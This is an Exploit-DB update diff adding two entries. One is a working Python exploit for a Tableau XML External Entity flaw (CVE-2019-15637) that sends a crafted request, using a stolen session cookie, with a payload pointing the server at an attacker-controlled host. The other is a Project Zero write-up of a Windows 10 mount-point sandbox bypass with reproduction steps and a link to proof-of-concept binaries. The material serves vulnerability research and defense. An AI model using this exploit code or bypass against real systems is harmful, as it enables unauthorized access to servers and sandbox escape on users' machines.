DB: 2019-08-28

2 changes to exploits/shellcodes

Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass

Tableau - XML External Entity

exploits/multiple/webapps/47308.py

@@ -0,0 +1,70 @@
+# Exploit Title: Tableau XXE 
+# Google Dork: N/A
+# Date: Reported to vendor July 2019, fix released August 2019.
+# Exploit Author: Jarad Kopf
+# Vendor Homepage: https://www.tableau.com/
+# Software Link: Tableau Desktop downloads: https://www.tableau.com/products/desktop/download
+# Version/Products: See Tableau Advisory: https://community.tableau.com/community/security-bulletins/blog/2019/08/22/important-adv-2019-030-xxe-vulnerability-in-tableau-products
+# Tested on: Windows
+# CVE: CVE-2019-15637
+
+#This comes from https://community.tableau.com/community/security-bulletins/blog/2019/08/22/important-adv-2019-030-xxe-vulnerability-in-tableau-products
+#Severity: High ======   CVSS3 Score: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L - 7.1 High ====== Product Specific Notes: Malicious workbooks, data sources, and extensions files that are published or used on Tableau Server can trigger this vulnerability
+#see also https://github.com/minecrater/exploits/blob/master/TableauXXE.py
+
+#Unfortunately as I did not have access to the source code a lot of this couldn't really be coded. 
+#Lot of this seems to be user specific (zoneid, dashboard etc). Virtually just taking the vulnerable request and running the exploit. 
+#Very bare bones...wish I could've done more, but maybe someone else with access to the source would want to do that as an exercise.
+
+import requests
+import sys 
+from warnings import filterwarnings
+
+# Globals
+proxy = 'http://127.0.0.1:8080'
+proxies = {'http':proxy, 'https':proxy}
+filterwarnings('ignore')
+
+def xxe(target, attackerserver, boundary, cookie, zoneid, dashboard):
+	payload = """<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE root PUBLIC "-//A/B/EN" """
+	payload += "\""+attackerserver+"\"><svg xmlns:svg=\"http://www.w3.org/2000/svg\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" width=\"200\" height=\"200\"><text x=\"0\" y=\"20\" font-size=\"20\">test</text></svg>"
+	headers = {'Content-Type': 'multipart/form-data; boundary='+boundary, 'Cookie': 'workgroup_session_id='+cookie}
+	data = "--"+boundary+"\r\n"
+	data += """Content-Disposition: form-data; name=\"zoneId\""""+"\r\n"
+	data += "\r\n"
+	#below will be different for each user - this is the zoneid of the dashboard you're exploiting this against
+	data += zoneid+ "\r\n"
+	data += "--"+boundary+"\r\n"
+	data += """Content-Disposition: form-data; name=\"dashboard\""""+"\r\n"
+	data += "\r\n"
+	#below will be different for each user - the name of the dashboard we have access to which we're exploiting this against
+	data += dashboard + "\r\n"
+	data += "--"+boundary+"\r\n"
+	data += """Content-Disposition: form-data; name=\"wasCanceled\""""+"\r\n"
+	data += "\r\n"
+	data += "false"
+	data += "\r\n"
+	data += "--"+boundary+"\r\n"
+	data += """Content-Disposition: form-data; name=\"extensionManifestContents\""""+"\r\n"
+	data += "\r\n"
+	data += payload
+	data += "\r\n"
+	data += "--"+boundary+"--"
+	
+	r = requests.post(target, headers=headers, data=data, proxies=proxies, verify=False)
+	
+def main():
+	if len(sys.argv) != 7:
+		print "(+) usage: %s <target><attackerserver><boundary><workgroup_session_id_cookie><zoneid><dashboardname>"  % sys.argv[0]
+		sys.exit(-1) 
+ 	target = sys.argv[1]	 
+	attackerserver = sys.argv[2]
+	boundary = sys.argv[3]
+	cookie = sys.argv[4]
+	zoneid = sys.argv[5]
+	dashboard = sys.argv[6]
+	xxe(target,attackerserver,boundary,cookie,zoneid,dashboard)
+	print "making request, make sure to catch the HTTP request!"
+	 
+if __name__ == "__main__":
+	main()

exploits/windows/local/47306.txt

@@ -0,0 +1,33 @@
+Windows: SET_REPARSE_POINT_EX Mount Point Security Feature Bypass
+Platform: Windows 10 1903, 1809 (not tested earlier)
+Class: Security Feature Bypass
+
+Summary: 
+
+The NTFS driver supports a new FS control code to set a mount point which the existing sandbox mitigation doesn’t support allowing a sandboxed application to set an arbitrary mount point symbolic link.
+
+Description:
+
+After multiple previous attempts the kernel mitigation against adding arbitrary NTFS mount points seems pretty robust. However due to the way it was implemented inside the IO manager in the kernel it is fragile to changes inside the filesystem drivers as the mitigation is only implemented when the FSCTL_SET_REPASE_POINT control code is used.
+
+In this case at some point (based on headers probably RS1) a new FSCTL was added to NTFS, FSCTL_SET_REPARSE_POINT_EX to allow overwriting an existing reparse point without having to first delete it. This FSCTL has a different control code to the old one, therefore issuing it does not trigger the mitigation and an arbitrary mount point can be set from any sandboxed applications. This mount point could then facilitate further attacks, for example https://bugs.chromium.org/p/project-zero/issues/detail?id=1413 is probably now vulnerable again to drop an arbitrary file as the current user.
+
+Fixing wise obviously you’d want to also detect this FSCTL and handle it in the mitigation. You’ll probably want to verify the NTFS implementation to check that it’s not possible to just change the data without specifying a valid tag when an existing tag is already set as the single optional flag you can specify isn’t exactly clear on this. You might also want to find a way of getting visibility on new changes which can affect symbolic link operations, as this is 3rd time this has happened recently (previously NPFS symlinks and global symlinks) that I know of.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will create a temporary directory, drop its token’s IL to Low then set that directory to be a mount point to the windows folder which would not normally be allowed.
+
+1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
+2) As a normal user run the PoC. 
+3) The PoC should print the set mount point path.
+
+Expected Result:
+Setting the mount point should fail with access denied.
+
+Observed Result:
+The mount point is set to an arbitrary directory.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47306.zip

files_exploits.csv

@@ -10661,6 +10661,7 @@ id,file,description,date,author,type,platform,port
 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
 47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows,
 47258,exploits/windows/local/47258.txt,"Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities",2019-08-15,"Google Security Research",local,windows,
+47306,exploits/windows/local/47306.txt,"Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass",2019-08-26,"Google Security Research",local,windows,
 47307,exploits/linux/local/47307.rb,"Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)",2019-08-26,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
@@ -41663,3 +41664,4 @@ id,file,description,date,author,type,platform,port
 47303,exploits/php/webapps/47303.txt,"WordPress Plugin Import Export WordPress Users 1.3.1 - CSV Injection",2019-08-26,"Javier Olmedo",webapps,php,80
 47304,exploits/php/webapps/47304.txt,"WordPress Plugin UserPro 4.9.32 - Cross-Site Scripting",2019-08-26,"Damian Ebelties",webapps,php,80
 47305,exploits/php/webapps/47305.py,"openITCOCKPIT 3.6.1-2 - Cross-Site Request Forgery",2019-08-26,"Julian Rittweger",webapps,php,80
+47308,exploits/multiple/webapps/47308.py,"Tableau - XML External Entity",2019-08-27,"Jarad Kopf",webapps,multiple,